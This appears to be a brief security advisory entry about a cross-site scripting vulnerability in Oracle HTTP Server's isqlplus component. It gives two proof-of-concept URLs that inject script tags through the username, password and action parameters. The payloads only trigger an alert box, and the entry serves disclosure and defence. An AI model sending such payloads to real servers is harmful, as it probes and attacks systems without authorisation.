|
|
Oracle HTTP Server isqlplus Cross-Site Scripting Vulnerability
The following proof of concepts were supplied: http://<host>/isqlplus?action=logon&username=sdfds%22%3e%3cscript%3ealert('XSS')%3c/script%3e\&password=dsfsd%3cscript%3ealert('XSS')%3c/script%3e http://<host>/isqlplus?action=<script>alert('XSS')</script> |
|
Privacy Statement |